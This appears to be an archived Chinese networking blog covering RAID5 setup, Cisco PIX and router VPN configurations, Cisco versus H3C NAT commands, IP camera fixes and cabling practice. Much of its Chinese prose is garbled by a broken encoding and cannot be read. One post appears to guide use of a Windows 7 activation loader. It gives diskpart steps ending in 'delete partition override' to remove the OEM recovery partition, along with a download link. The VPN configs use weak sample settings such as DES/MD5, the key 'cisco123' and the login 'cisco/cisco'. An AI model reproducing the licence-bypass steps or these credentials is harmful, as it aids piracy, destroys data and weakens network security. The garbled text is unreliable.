��Ƚ��װ�ã�Ȼ��Ӳ�̲��SATA��ߣ��ϵ��ĸ�SATA�ӿڣ��ò��Ӻ��ҵ�LG��¼��ã��ֻ�ṩ��1��IDE�ӿ��ӹ��ã��ʾ��̡��꣬��ԣ��˳��DEL��bios��

��BIOS�￴��Ѿ�ʶ��Ŀ��250G��Ӳ�̺�LG��¼��

Ӳ�̺�LG��¼��

��Ӳ��raid5ģʽ��ĸ�Ӳ��raid5��У��ʿ��Ȼ��в��˵��龹Ȼ��Ӣ�ĵģ��E�Ĳ��õ��ѳ��ʹ��Ҫ��Σ��ҵ��Ҳ��ĥ��죬�ִ��˸�ʿ��˾800��绰��ֱ��ֵ��С��ʷ��ˣ��Ÿ��״��䣬��Ҿ͸��ƶ��굽integrated peripherals�س��

��ѡ��OnChip IDE Device��ٻس��

��ѡ��SATA Mode��Ĭ��ѡ��IDE��Ҳ��ǲ��raidģʽ��ڻس��ý��档

��ƶ��ѡ��raid��Ȼ��س��

��ʾ��ĸ��Ӳ��Ѿ��raid��ʶ��ʾ��CTRL-I��raid��ϸ��á�

��raid��ϸ��ý��棬��MAIN MENU��ѡ��һ��Create RAID Volume��½�raid��

��ڽ��CREATE VOLUME MENU��棬�ڵ�һ��Name��¾��֣��õ��Volume0��Ҳ��tanghua֮��ģ��ƶ��굽�ڶ��RAID Level��ѡ��raidģʽ��raid0��raid1��raid10��raid5�ĸ�ѡ��ȻҪѡ��raid5��

��ƶ��굽Disksѡ���س��ѡ��Ҫ��ЩӲ�̼��뵽��raid��

��ǵ�ȻҪ��Ѿ��ӵ��ϵ��ĸ�Ӳ�̶��ѡ��ʽ�ǰ��¼�ͷ��ƶ��굽��Ҫ��Ӳ��ϣ�Ȼ�󰴿ո��Ӳ��Ƶ�ǰ��ͻ��һ��СС��Ǳ�ǣ��Ӳ��Ѿ��raid5��

��س��ص��һ��ý��棬��ʱ��Capacityѡ��ʾ��Ŀǰ4��Ӳ��ɵ�raid5��е��698.7G��Ȳ��raid0ģʽ��ĸ�Ӳ��֮�ͣ�Ҳ��raid1��ĸ�Ӳ��֮�͵�һ�룬��Ǵ�Լʮ��֮�ߣ��ʱϵͳӲ�̵Ĵ��Ҳ��õĺܴ��ߣ��ĳһ��Ӳ�̻��ˣ��ݲ��ᶪʧ��ֻ��һ��µ�Ӳ�̣��raid5��Ķ��񲻻��Ϊ��ݶ�ʧ��жϣ��˵��raid5ģʽ��raid0ģʽ�Ĵ��ٶȺ��ŵ㣬ͬʱҲ��raid1�İ�ȫ�ԡ�

��Strip Sizeѡ���Ĭ��ֵ��ɡ�

��󣬻�Ҫ��ͣ��Create Volumeѡ��ϣ��س��ȷ��raid5��̾��

��ص��MAIN MENU��ʱ��ոս��raid5��е�һЩ��status״̬��ʾnormal��˵��һ��Ѿ��raid5�е��Ŀ�250GӲ�̵Ĳ��

��Ϳ��԰�װϵͳ��ˡ��װ��ϵͳ��֮��Ӳ��raid5��װ��ˡ��ǿ�һ��ΰ�װ��raid5

���� 鿴��

Cisco VPN��ʵ��

panhc007 — 2009-11-19 15:19

��

һ��Pix-Pix
��·��·��֮��VPN��
��·��-·��Լ�VPN Client֮��VPN

һ��Pix-Pix

PIX Central

Building configuration...
: Saved
:
PIX Version 6.3(3)
interface ethernet0 auto
interface ethernet1 auto
nameif ethernet0 outside security0
nameif ethernet1 inside security100
enable password 8Ry2YjIyt7RRXU24 encrypted
passwd 2KFQnbNIdI.2KYOU encrypted
hostname pix-central
fixup protocol dns maximum-length 512
fixup protocol ftp 21
fixup protocol h323 h225 1720
fixup protocol h323 ras 1718-1719
fixup protocol http 80
fixup protocol rsh 514
fixup protocol rtsp 554
fixup protocol sip 5060
fixup protocol sip udp 5060
fixup protocol skinny 2000
fixup protocol smtp 25
fixup protocol sqlnet 1521
fixup protocol tftp 69
names

!--- This is traffic to PIX 2.

access-list 120 permit ip 10.1.1.0 255.255.255.0 10.2.2.0 255.255.255.0

!--- This is traffic to PIX 3.

access-list 130 permit ip 10.1.1.0 255.255.255.0 10.3.3.0 255.255.255.0

!--- Do not do Network Address Translation (NAT) on traffic to other PIXes.

access-list 100 permit ip 10.1.1.0 255.255.255.0 10.2.2.0 255.255.255.0
access-list 100 permit ip 10.1.1.0 255.255.255.0 10.3.3.0 255.255.255.0
pager lines 24
logging on
mtu outside 1500
mtu inside 1500
ip address outside 172.18.124.153 255.255.255.0
ip address inside 10.1.1.1 255.255.255.0
ip audit info action alarm
ip audit attack action alarm
pdm history enable
arp timeout 14400

!--- Do not do NAT on traffic to other PIXes.

nat (inside) 0 access-list 100
route outside 0.0.0.0 0.0.0.0 172.18.124.1 1
timeout xlate 3:00:00
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225 1:00:00
timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00
timeout uauth 0:05:00 absolute
aaa-server TACACS+ protocol tacacs+
aaa-server RADIUS protocol radius
aaa-server LOCAL protocol local
no snmp-server location
no snmp-server contact
snmp-server community public
snmp-server enable traps
floodguard enable
sysopt connection permit-ipsec
crypto ipsec transform-set myset esp-des esp-md5-hmac

!--- This is traffic to PIX 2.

crypto map newmap 20 ipsec-isakmp
crypto map newmap 20 match address 120
crypto map newmap 20 set peer 172.18.124.154
crypto map newmap 20 set transform-set myset

!--- This is traffic to PIX 3.

crypto map newmap 30 ipsec-isakmp
crypto map newmap 30 match address 130
crypto map newmap 30 set peer 172.18.124.157
crypto map newmap 30 set transform-set myset
crypto map newmap interface outside
isakmp enable outside
isakmp key ******** address 172.18.124.154 netmask 255.255.255.255
no-xauth no-config-mode
isakmp key ******** address 172.18.124.157 netmask 255.255.255.255
no-xauth no-config-mode
isakmp identity address
isakmp policy 10 authentication pre-share
isakmp policy 10 encryption des
isakmp policy 10 hash md5
isakmp policy 10 group 1
isakmp policy 10 lifetime 1000
telnet timeout 5
ssh timeout 5
console timeout 0
terminal width 80
Cryptochecksum:d41d8cd98f00b204e9800998ecf8427e
: end

PIX 2

Building configuration...
: Saved
:
PIX Version 6.3(3)
interface ethernet0 auto
interface ethernet1 auto
nameif ethernet0 outside security0
nameif ethernet1 inside security100
enable password 8Ry2YjIyt7RRXU24 encrypted
passwd 2KFQnbNIdI.2KYOU encrypted
hostname pix2
fixup protocol dns maximum-length 512
fixup protocol ftp 21
fixup protocol h323 h225 1720
fixup protocol h323 ras 1718-1719
fixup protocol http 80
fixup protocol rsh 514
fixup protocol rtsp 554
fixup protocol sip 5060
fixup protocol sip udp 5060
fixup protocol skinny 2000
fixup protocol smtp 25
fixup protocol sqlnet 1521
fixup protocol tftp 69
names

!--- This is traffic to PIX Central.

access-list 110 permit ip 10.2.2.0 255.255.255.0 10.1.1.0 255.255.255.0

!--- Do not do NAT on traffic to PIX Central.

access-list 100 permit ip 10.2.2.0 255.255.255.0 10.1.1.0 255.255.255.0
pager lines 24
logging on
mtu outside 1500
mtu inside 1500
ip address outside 172.18.124.154 255.255.255.0
ip address inside 10.2.2.1 255.255.255.0
ip audit info action alarm
ip audit attack action alarm
no failover
failover timeout 0:00:00
failover poll 15
no failover ip address outside
no failover ip address inside
pdm history enable
arp timeout 14400

!--- Do not do NAT on traffic to PIX Central.

nat (inside) 0 access-list 100
route outside 0.0.0.0 0.0.0.0 172.18.124.1 1
timeout xlate 3:00:00
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225 1:00:00
timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00
timeout uauth 0:05:00 absolute
aaa-server TACACS+ protocol tacacs+
aaa-server RADIUS protocol radius
aaa-server LOCAL protocol local
no snmp-server location
no snmp-server contact
snmp-server community public
no snmp-server enable traps
floodguard enable
sysopt connection permit-ipsec
crypto ipsec transform-set myset esp-des esp-md5-hmac

!--- This is traffic to PIX Central.

crypto map newmap 10 ipsec-isakmp
crypto map newmap 10 match address 110
crypto map newmap 10 set peer 172.18.124.153
crypto map newmap 10 set transform-set myset
crypto map newmap interface outside
isakmp enable outside
isakmp key ******** address 172.18.124.153 netmask 255.255.255.255
no-xauth no-config-mode
isakmp identity address
isakmp policy 10 authentication pre-share
isakmp policy 10 encryption des
isakmp policy 10 hash md5
isakmp policy 10 group 1
isakmp policy 10 lifetime 1000
telnet timeout 5
ssh timeout 5
console timeout 0
terminal width 80
Cryptochecksum:d41d8cd98f00b204e9800998ecf8427e
: end

PIX 3 Configuration

Building configuration...
: Saved
:
PIX Version 6.3(3)
interface ethernet0 auto
interface ethernet1 auto
nameif ethernet0 outside security0
nameif ethernet1 inside security100
enable password 8Ry2YjIyt7RRXU24 encrypted
passwd 2KFQnbNIdI.2KYOU encrypted
hostname pix3
fixup protocol dns maximum-length 512
fixup protocol ftp 21
fixup protocol h323 h225 1720
fixup protocol h323 ras 1718-1719
fixup protocol http 80
fixup protocol rsh 514
fixup protocol rtsp 554
fixup protocol sip 5060
fixup protocol sip udp 5060
fixup protocol skinny 2000
fixup protocol smtp 25
fixup protocol sqlnet 1521
fixup protocol tftp 69
names

!--- This is traffic to PIX Central.

access-list 110 permit ip 10.3.3.0 255.255.255.0 10.1.1.0 255.255.255.0

!--- Do not do NAT on traffic to PIX Central.

access-list 100 permit ip 10.3.3.0 255.255.255.0 10.1.1.0 255.255.255.0
pager lines 24
logging on
mtu outside 1500
mtu inside 1500
ip address outside 172.18.124.157 255.255.255.0
ip address inside 10.3.3.1 255.255.255.0
ip audit info action alarm
ip audit attack action alarm
no failover
failover timeout 0:00:00
failover poll 15
no failover ip address outside
no failover ip address inside
pdm history enable
arp timeout 14400

!--- Do not do NAT on traffic to PIX Central.

nat (inside) 0 access-list 100
route outside 0.0.0.0 0.0.0.0 172.18.124.1 1
timeout xlate 3:00:00
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225 1:00:00
timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00
timeout uauth 0:05:00 absolute
aaa-server TACACS+ protocol tacacs+
aaa-server RADIUS protocol radius
aaa-server LOCAL protocol local
no snmp-server location
no snmp-server contact
snmp-server community public
no snmp-server enable traps
floodguard enable
sysopt connection permit-ipsec
crypto ipsec transform-set myset esp-des esp-md5-hmac

!--- This is traffic to PIX Central.

crypto map newmap 10 ipsec-isakmp
crypto map newmap 10 match address 110
crypto map newmap 10 set peer 172.18.124.153
crypto map newmap 10 set transform-set myset
crypto map newmap interface outside
isakmp enable outside
isakmp key ******** address 172.18.124.153 netmask 255.255.255.255
no-xauth no-config-mode
isakmp identity address
isakmp policy 10 authentication pre-share
isakmp policy 10 encryption des
isakmp policy 10 hash md5
isakmp policy 10 group 1
isakmp policy 10 lifetime 1000
telnet timeout 5
ssh timeout 5
console timeout 0
terminal width 80
Cryptochecksum:aa3bbd8c6275d214b153e1e0bc0173e4
: end

��·��·��֮��VPN��

Hub Router

2503#show running-config
Building configuration...
Current configuration : 1466 bytes
!
version 12.2

service timestamps debug datetime msec
service timestamps log uptime
no service password-encryption
!
hostname 2503
!

!
ip subnet-zero
!

!

!--- Configuration for IKE policies.

crypto isakmp policy 10

!--- Enables the IKE policy configuration (config-isakmp)
!--- command mode, where you can specify the parameters that
!--- are used during an IKE negotiation.

hash md5
authentication pre-share
crypto isakmp key cisco123 address 200.1.2.1
crypto isakmp key cisco123 address 200.1.3.1

!--- Specifies the preshared key "cisco123" which should
!--- be identical at both peers. This is a global
!--- configuration mode command.

!

!--- Configuration for IPSec policies.

crypto ipsec transform-set myset esp-des esp-md5-hmac

!--- Enables the crypto transform configuration mode,
!--- where you can specify the transform sets that are used
!--- during an IPSec negotiation.

!
crypto map mymap 10 ipsec-isakmp

!--- Indicates that IKE is used to establish
!--- the IPSec security association for protecting the
!--- traffic specified by this crypto map entry.

set peer 200.1.2.1

!--- Sets the IP address of the remote end.

set transform-set myset

!--- Configures IPSec to use the transform-set
!--- "myset" defined earlier in this configuration.

match address 110

!--- Specifyies the traffic to be encrypted.

crypto map mymap 20 ipsec-isakmp
set peer 200.1.3.1
set transform-set myset
match address 120
!
!
!
!
interface Loopback0
ip address 10.1.1.1 255.255.255.0
!
interface Ethernet0
ip address 200.1.1.1 255.255.255.0
no ip route-cache

!--- You must enable process switching for IPSec
!--- to encrypt outgoing packets. This command disables fast switching.

no ip mroute-cache
crypto map mymap

!--- Configures the interface to use the
!--- crypto map "mymap" for IPSec.

!

!--- Output suppressed.

ip classless
ip route 172.16.1.0 255.255.255.0 Ethernet0
ip route 192.168.1.0 255.255.255.0 Ethernet0
ip route 200.1.0.0 255.255.0.0 Ethernet0
ip http server

!
access-list 110 permit ip 10.1.1.0 0.0.0.255 172.16.1.0 0.0.0.255
access-list 110 permit ip 192.168.1.0 0.0.0.255 172.16.1.0 0.0.0.255
access-list 120 permit ip 10.1.1.0 0.0.0.255 192.168.1.0 0.0.0.255
access-list 120 permit ip 172.16.1.0 0.0.0.255 192.168.1.0 0.0.0.255

!--- This crypto ACL-permit identifies the
!--- matching traffic flows to be protected via encryption.

Spoke 1 Router

2509a#show running-config
Building configuration...
Current configuration : 1203 bytes
!
version 12.2

service timestamps debug datetime msec
service timestamps log uptime
no service password-encryption
!
hostname 2509a
!
enable secret 5 $1$DOX3$rIrxEnTVTw/7LNbxi.akz0

!
ip subnet-zero
no ip domain-lookup
!

!
crypto isakmp policy 10
hash md5
authentication pre-share
crypto isakmp key cisco123 address 200.1.1.1
!
!
crypto ipsec transform-set myset esp-des esp-md5-hmac
!
crypto map mymap 10 ipsec-isakmp
set peer 200.1.1.1
set transform-set myset
match address 110
!
!
!
!
interface Loopback0
ip address 172.16.1.1 255.255.255.0
!
interface Ethernet0
ip address 200.1.2.1 255.255.255.0
no ip route-cache
no ip mroute-cache
crypto map mymap
!

.
.

!--- Output suppressed.

.
.
ip classless
ip route 10.1.1.0 255.255.255.0 Ethernet0
ip route 192.168.1.0 255.255.255.0 Ethernet0
ip route 200.1.0.0 255.255.0.0 Ethernet0
no ip http server

!
access-list 110 permit ip 172.16.1.0 0.0.0.255 10.1.1.0 0.0.0.255
access-list 110 permit ip 172.16.1.0 0.0.0.255 192.168.1.0 0.0.0.255
!

end
2509a#

Spoke 2 Router

VPN2509#show running-config
Building configuration...
Current configuration : 1117 bytes
!
version 12.2

service timestamps debug datetime msec
service timestamps log uptime
service password-encryption
!
hostname VPN2509
!

!
ip subnet-zero
no ip domain-lookup
!

!
crypto isakmp policy 10
hash md5
authentication pre-share
crypto isakmp key cisco123 address 200.1.1.1
!
!
crypto ipsec transform-set myset esp-des esp-md5-hmac
!
crypto map mymap 10 ipsec-isakmp
set peer 200.1.1.1
set transform-set myset
match address 120
!
!
!
!
interface Loopback0
ip address 192.168.1.1 255.255.255.0
!
interface Ethernet0
ip address 200.1.3.1 255.255.255.0

!--- No ip route-cache.

no ip mroute-cache
crypto map mymap
!

.
.

!--- Output suppressed.

.
.
ip classless
ip route 10.1.1.0 255.255.255.0 Ethernet0
ip route 172.16.0.0 255.255.0.0 Ethernet0
ip route 200.1.0.0 255.255.0.0 Ethernet0
no ip http server

!
access-list 120 permit ip 192.168.1.0 0.0.0.255 172.16.1.0 0.0.0.255
access-list 120 permit ip 192.168.1.0 0.0.0.255 10.1.1.0 0.0.0.255
!

end

��·��-·��Լ�VPN Client֮��VPN

Cisco 2611 Router

vpn2611#show run
Building configuration...

Current configuration : 2265 bytes
!
version 12.2
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname vpn2611
!

!--- Enable aaa for user authentication
!--- and group authorization.

aaa new-model
!
!

!--- To enable X-Auth for user authentication,
!--- enable the aaa authentication commands.

aaa authentication login userauthen local

!--- To enable group authorization, enable
!--- the aaa authorization commands.

aaa authorization network groupauthor local
aaa session-id common
!

!--- For local authentication of the IPSec user,
!--- create the user with password.

username cisco password 0 cisco
ip subnet-zero
!
!
!
ip audit notify log
ip audit po max-events 100
!

!--- Create an Internet Security Association and
!--- Key Management Protocol (ISAKMP)
!--- policy for Phase 1 negotiations for the VPN 3.x clients.

crypto isakmp policy 3
encr 3des
authentication pre-share
group 2
!

!--- Create an ISAKMP policy for Phase 1
!--- negotiations for the LAN-to-LAN tunnels.

crypto isakmp policy 10
hash md5
authentication pre-share

!--- Specify the PreShared key for the LAN-to-LAN tunnel.
!--- Make sure that you use
!--- no-xauth parameter with your ISAKMP key.

crypto isakmp key cisco123 address 172.18.124.199 no-xauth
!!

!--- Create a group that will be used to
!--- specify the WINS, DNS servers' address
!--- to the client, along with the pre-shared
!--- key for authentication.

crypto isakmp client configuration group 3000client
key cisco123
dns 10.10.10.10
wins 10.10.10.20
domain cisco.com
pool ippool
!!
!

!--- Create the Phase 2 Policy for actual data encryption.

crypto ipsec transform-set myset esp-3des esp-md5-hmac
!

!--- Create a dynamic map and apply
!--- the transform set that was created above.

crypto dynamic-map dynmap 10
set transform-set myset
!
!

!--- Create the actual crypto map, and
!--- apply the aaa lists that were created
!--- earlier. Also create a new instance for your
!--- LAN-to-LAN tunnel. Specify the peer IP address,
!--- transform set and an Access Control List (ACL) for this
!--- instance.

crypto map clientmap client authentication list userauthen
crypto map clientmap isakmp authorization list groupauthor
crypto map clientmap client configuration address respond
crypto map clientmap 1 ipsec-isakmp
set peer 172.18.124.199
set transform-set myset
match address 100
crypto map clientmap 10 ipsec-isakmp dynamic dynmap
!
!
fax interface-type fax-mail
mta receive maximum-recipients 0
!
!

!--- Apply the crypto map on the outside interface.

interface Ethernet0/0
ip address 172.18.124.159 255.255.255.0
half-duplex
crypto map clientmap
!
interface Serial0/0
no ip address
shutdown
!
interface Ethernet0/1
ip address 10.10.10.1 255.255.255.0
no keepalive
half-duplex
!
!

!--- Create a pool of addresses to be
!--- assigned to the VPN Clients.

ip local pool ippool 14.1.1.100 14.1.1.200
ip classless
ip route 0.0.0.0 0.0.0.0 172.18.124.1
ip http server
ip pim bidir-enable
!
!

!--- Create an ACL for the traffic
!--- to be encrypted. In this example,
!--- the traffic from 10.10.10.0/24 to 10.10.20.0/24
!--- would be encrypted.

access-list 100 permit ip 10.10.10.0 0.0.0.255 10.10.20.0 0.0.0.255
!
!
snmp-server community foobar RO
call rsvp-sync
!
!
mgcp profile default
!
dial-peer cor custom
!
!
line con 0
exec-timeout 0 0
line aux 0
line vty 0 4
!
!
end

Configuring the 3640 Router
Cisco 3640 Router

vpn3640#show run
Building configuration...

Current configuration : 1287 bytes
!
! Last configuration change at 13:47:37 UTC Wed Mar 6 2002
!
version 12.2
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname vpn3640
!
!
ip subnet-zero
ip cef
!

!--- Create an ISAKMP policy for Phase 1
!--- negotiations for the LAN-to-LAN tunnels.

crypto isakmp policy 10
hash md5
authentication pre-share

!--- Specify the PreShared key for the LAN-to-LAN
!--- tunnel. You do not have to add
!--- X-Auth parameter, as this
!--- router is not doing Cisco Unity Client IPSEC
!--- authentication.

crypto isakmp key cisco123 address 172.18.124.159
!
!

!--- Create the Phase 2 Policy for actual data encryption.

crypto ipsec transform-set myset esp-3des esp-md5-hmac
!

!--- Create the actual crypto map. Specify
!--- the peer IP address, transform
!--- set and an ACL for this instance.

crypto map mymap 10 ipsec-isakmp
set peer 172.18.124.159
set transform-set myset
match address 100
!
call RSVP-sync
!
!
!

!--- Apply the crypto map on the outside interface.

interface Ethernet0/0
ip address 172.18.124.199 255.255.255.0
half-duplex
crypto map mymap
!
interface Ethernet0/1
ip address 10.10.20.1 255.255.255.0
half-duplex
!
ip classless
ip route 0.0.0.0 0.0.0.0 172.18.124.1
ip http server
ip pim bidir-enable
!

!--- Create an ACL for the traffic to
!--- be encrypted. In this example,
!--- the traffic from 10.10.20.0/24 to 10.10.10.0/24
!--- would be encrypted.

access-list 100 permit ip 10.10.20.0 0.0.0.255 10.10.10.0 0.0.0.255
snmp-server community foobar RO
!
dial-peer cor custom
!
!
line con 0
exec-timeout 0 0
line aux 0
line vty 0 4
login
!
end

��cisco��缼�� 鿴��

��ֲ��ܼ��Win 7 ��ͽ��

panhc007 — 2009-11-11 08:37

ǰ��

��֪��ĿǰWin7�ļ��ţë��Щ��ѵĻ��Ǽ���ˣ��ҪˢBIOS�ȸ�Σ��

��ͨ��Win7��ԭ��һ��ܹ��󲿷�OEM��ϵͳ��Win7�ķ��ϣ��ܹ��Ҫ��ѡ�

��

Ŀǰ��PCSKYS_Windows7LoaderΪ��һϵ��win7�� ǻ��ͨ��ҵ�Ӳ��ϵ�ϵͳ��SLIC+֤��ļ��ٵ��OEM��Կ��ʵ��ϵͳ�ļ����Ҫֱ��ڵͼ�״̬��ҵ�Ӳ�̵��Ȼ��Ӳ��δ��ط��ô��޷��ҵ�Ӳ�̵��Ӷ�ʹ��ƽ�ʧ�ܣ�

ԭ��1. ��ڰ�װwin7ʱѡ��Ϊϵͳ��ר�ŷֳ�100M�Ļ��Ӳ��зֳ�һ��û�о��ϵͳ��ͼ��

ԭ��2. �൱��Ʒ�ƻ��̨ʽ�ͱʼǱ��ӵ��õ�ϵͳ��ԭ��ܣ��ѻ�ԭ��ݴ洢��EISA��õ��ط��棬һ��޷��в��֤��ϵͳ��ԭ�İ�ȫ�ԣ��ͼ��ǲ��ܶ��κβ��ֻ��“��”��

��Ҳ��Ϊ��ɶ��“��ط��”��ʹ��win7��Ҳ��Ӳ�̵��Ӷ��ϵͳ��ܼ��

��

��ԭ��1��Ŀǰ��༤��Ҳ��û��ṩ��Ե��ʾ��

��ֻҪ��ʾ��ϵͳ��һ��꼴�ɣ�

��ԭ��2��Ҫִ��һЩ��в��ɾ��“OEM��ط��”��Ӷ�ʹ��ܹ�˳��ҵ�Ӳ�̵��м��

��ͼ��ʾ��OEM��ط��ѱ��ɹ�ɾ��

��Ϳ��ʹ�ü��Win7��м��ˣ��Win7��ȫ��Ӳ�̰�װWin7��ߣ�

�뵽�ҵ�skydrive��أ�

http://cid-74fe5b3dbec6b75b.skydrive.live.com/browse.aspx/.Public?uc=2

��

��д��µ�ͬʱ��һ��Ƶ��“ʹ��˫Ӳ�̵Ļ��޷��”ԭ��뱾��н��ܵ�ԭ��1��ԭ��2��ƣ��Ȼ�ǰε��̣�֮��̣��м��——�ɹ��

1��ʹ��“Run As Administrator”��ʽ��cmd��“diskpart”��ȷ��diskpart.exe��
2��“list disk”�ûس��ʾ��б�
��
3��“select disk ��̺�”��“selectdisk 0”�� ûس��ѡ��Ӧ�Ĵ��̡�
��
4��“list partition”���ûس��ʾ��ѡ��̵ķ��
��
5��“select partition ��”��ȷ�ϣ�ѡ��ط��ķ��ţ��ڴ��ѡ��OEM�̼� select partition 1��
��
6��“delete partition override ”��ɾ��ǰѡ��ķ��

��cmd��“diskpart”��ȷ��diskpart.exe��

��ߣ�Lance Zhang��Lance Zhang's Tech Blog��
��http://blodfox777.cnblogs.com/

���� 鿴��

cisco��H3C nat��öԱ�

panhc007 — 2009-11-02 11:02

��̬NAT

cisco��
ip nat inside source static 192.168.1.10 200.1.1.1
inte fa0/0
ip nat inside
inte fa0/2
ip nat outside

H3C:
nat static 192.168.10.1 200.1.1.1
interface s0/2/0
nat out static

��̬NAT��PAT

cisco:
acc-list 1 permit 192.168.10.0 0.0.0.255                     --��Ҫת��IP��ַ
ip nat pool cnc 200.1.1.1 200.1.1.10 netmask 255.255.255.0   --��ַ��
ip nat inside source list 1 pool cnc ��overload��           --��õ�ַ��

H3C��
��б�:
acl number 2000
rule 10 permit source 192.168.10.0 0.0.0.255
��ַ�أ�
nat address-group 1 200.1.1.1 200.1.1.10
�ӿ��µ��NAT��
inte s0/2/0
nat out 2000 address-group 1 no-pat (ע�⣬h3CĬ��PAT��PAT��ں��no-pat)

++++++++++++++++++++++++++++++++++

cisco��˿�ӳ�䣺

��1��ڲ��ص�ַ��ڲ��Ϸ��ַ֮�佨��̬��ַת��ȫ��״̬��룺

��Ip nat inside source static tcp 192.168.1.254 80 202.103.23.123 80
��Ip nat inside source static udp 192.168.1.254 80 202.103.23.123 80

��2��ָ��ڲ��˿� �ڶ˿��״̬��룺

��ip nat inside

��3��ָ��ⲿ��ⲿ�˿� �ڶ˿��״̬��룺

��ip nat outside

��hauwei��nat��

int eth0/1
nat server protocol tcp global 202.103.23.123 80 inside 192.168.1.254 80

��cisco��缼�� 鿴��

��ͷip��

panhc007 — 2009-10-30 21:24

��ͷip��⣬

��

��ͷip��ң��ڽ��ip�滮�󣬶��ͷ��ip��

��Ƕ��ͷ��ip�޸�ʱ��޷��޸ģ��罫IP217�޸�Ϊ212��ͷ��ߺ��Ҳ��

��߽�217�޸�Ϊ212��ȷ�ϣ�ip�Զ��217.....

��޸ļ��Գɹ��ܶ��ͷ�Ļ��涪ʧ�ˡ�

��Ϸ��

��IP��ͻ��ɵģ�IP��ͻ��ô��Ƶ¼��NVR��޷��й��ͻᶪʧ��

�ܽ᣺

ͨ��NVR�޸��ͷ��ʧ�ܣ�Ψһ�Ľ��ǣ�

1��ͷ��ߴӸ��¥��
2��԰�װ��ͷ��ȥ��¥��ͷ��ȥ��ͷ�޸�IP��
3��޸��Ҫ��߲��ȥ��֮��
4��ȫ��޸��󣬽��ͷ��߽��¥�㽻��
5��NVR��й��

����ܽ�(ԭ��) �鿴��

һ��Ŀ��Ĺ滮

panhc007 — 2009-10-27 16:38

��Ŀ��

1��ȫ��豸ʹ�ù̶�IP��񻯹��

2��豸��һ��Σ�192.168.111.��

3��豸һ��Σ�192.168.99.x��

4��빤��һ�� 192.168.120.x��

5��°�װ�豸��޸Ĳ��֣��װ

6��ȫ��򵥱�ʾ��רҵ��

7��豸��ȷ��

����ܽ�(ԭ��) �鿴��

��豸��װ

panhc007 — 2009-10-26 15:36

��һ��Ѿ��ʩ��Ա��京��ȴ��һ��ԭ��ߵĹ��ַ��һ��

Ϊ��ۣ��߿��߹��գ�

�ٲ��

��һ�ֱȽϹ��ϵĲ��ͣ��ʱ��ܿ��Ӱ��“��ɽˮ��”��󣬴��߼ܵ�ģ��ֱ�ӽ�˫��ߴ��ֲ��ʱ��һ�ֺ�Ư��Ĳ�θУ�ÿ��24-48��˫��ߣ��

��͵��ŵ��ǽ�ʡ��˹��ȱ��Ƚ϶࣬��磺

��װ��豸ʱ��ƻ��ͣ��ֲ��׽��豸��װ��λ��

ÿ��˫��ߵ��ȫ��ģ��ĺ�ࡣ��ڶ˽ӵ�֮ǰû�ж�˫��߽��а��ô��һ��п��ܻ��¡��ģ��˫��߷��룬��߹��ϣ�

��һ�ڸ��߼��ĳһ��ģ��Ҫ��¶˽ӣ��ά��Աֻ��̽��“ˮ��”�ڽ��ʩ��ʱ��ʮ��˫��ߣ��˫��û�й�Դ��ɶ˽�ʱ��塣

��

��߼ܵ�ģ��˽��Ϻ󣬲�ͨ��Ժ��ٽ��ߡ��䷽��Ǵ�ģ�鿪ʼ��ߣ�ͬʱ�ż��Ҳ��ߡ��ŵ��ڲ��Ժ󣬲��ĳ��˫��߲��ͨ��ߣ��ȱ��ˣ��߿ں��߼ܣ��Ѿ��̶��ڻ��ڵ�ĳһ��Ȼ��ִ��ߣ�һ��ڻ��ĵײ��

��һ��Ϊ�˹��ߣ�ƾ��ۺ�˫��ߡ�

��ߵ��ŵ��ǲ��Ѿ��ɣ��ص��Ļ��³��ȡ��ȱ��Ϊ��µ��Ѿ��̶��֮��Ľ��棬Ҫ��ʮ�ַ��̶��֮��Ȼ��һ��˫��ɢ�ҵģ��һ��ڵذ��£��½��ʱ��컨�ϣ��Ͻ��ʱ��

��

��߼ܶ˽�ǰ��ߡ��ӻ��Ľ��߿ڿ�ʼ��ֱ��߼ܵ�ģ�鴦Ϊֹ��ߺ��ٽ��ж˽ӺͲ��ԡ�

��Ҫ�ﵽ��Ŀ��ǣ��Ի��Ľ��߿��߻��ˮƽ˫��ÿ��16/24/32/48��߼�Ϊ��λ��γ�һ��ˮƽ˫��ÿ��е�˫��ȫ��ƽ�У��ڶ̾��ڵ�˫��ƽ��߼䴮�Ų��Ӱ��ܣ��Ϊ�żܺ͵��߹��ÿ��˫��ߵĴ󲿷֣��ⲿ��ɢ�ŵģ��ǲ�ƽ�еģ��֮��ȫ��ƽ�У��ڻ��ÿ��˫��˳��赽��߼ܵĺ�࣬��Ȼ��˫��ȫ��ƽ�С��ÿ��ģ��ײ��ģ��Ӧ��˫��߳��˶��̶��ģ��߼��ϻ��߼ܵ�ģ��ڡ�

��ߵ��ŵ��ǿ��Ա�֤��ÿ�㶼��룬�Ҳ��½��档��ȱ��±��ڴ��ʱ�Ѿ��𻵣��ͨ��ߡ��ˣ��ߵ�ǰ��Ƕ��ºʹ��ߵ��㹻�İ��ա�

��ߵ��ŵ��ڻ��䣩��Խ��߿��߼�֮��ȫ��롢ƽ�У�ʮ��ۡ�ȱ��ʩ��ԱҪ��Լ��ʩ��ų�ֵİ��գ�ֻ��ڻ��ϲ��¶˽ӵĻ��ϲ��ܽ��ʩ��ڱ��л��Ŀǰ�Ĳ��߹��̹�˾�Ѿ��ܹ��չ��ʵ��Ƽ��߹��ա�

��˹�ԼΪ1.5�ˣ�ÿ24��ߺ�ʱ40��ң�δ��Ѱ��ߺŵ�ʱ�䣩��蹤��£�

��߹��嵥

��߰壺

��߰��ߵıر��ߣ��Բ��ά�塢��ѹ��ľ��ֳ��ƣ�Ҳ��ڹ�˾��ʹ�á�

